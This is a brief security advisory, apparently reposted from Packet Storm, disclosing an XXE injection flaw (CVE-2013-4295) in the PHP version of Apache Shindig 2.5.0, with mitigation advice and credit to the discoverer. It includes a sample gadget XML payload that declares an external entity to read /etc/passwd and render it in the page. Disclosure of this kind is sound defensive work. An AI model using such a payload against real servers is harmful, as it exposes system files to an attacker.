Apache Shindig 2.5.0 XXE Injection

Type packetstorm
Reporter Kousuke Ebihara
Modified 2013-10-22T00:00:00


                                            `CVE-2013-4295: XXE vulnerability In Apache Shindig 2.5.0 (PHP)  
Severity: Important  
Vendor: The Apache Software Foundation  
Versions Affected: Apache Shindig PHP 2.5.0  
Description: The gadget renderer in the PHP version of Apache Shindig  
is subject to an XML External Entity (XXE) Injection attack. The  
vulnerability allows a malicious gadget author to construct paths to  
content on the gadget rendering server which in turn will display the  
content in the gadget iframe.  
Mitigation: 2.5.0 users should upgrade to 2.5.0-update1.  
Example: The following gadget XML demonstrates the issue.  
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]>  
<ModulePrefs title="Test Application">  
<Require feature="opensocial-0.9" />  
<Content type="html">  
&passwd; hello  
After rendering this gadget you will see the content of /etc/passwd in  
the gadget iframe.  
Credit: This issue was discovered by Kousuke Ebihara.  
References: http://shindig.apache.org/security.html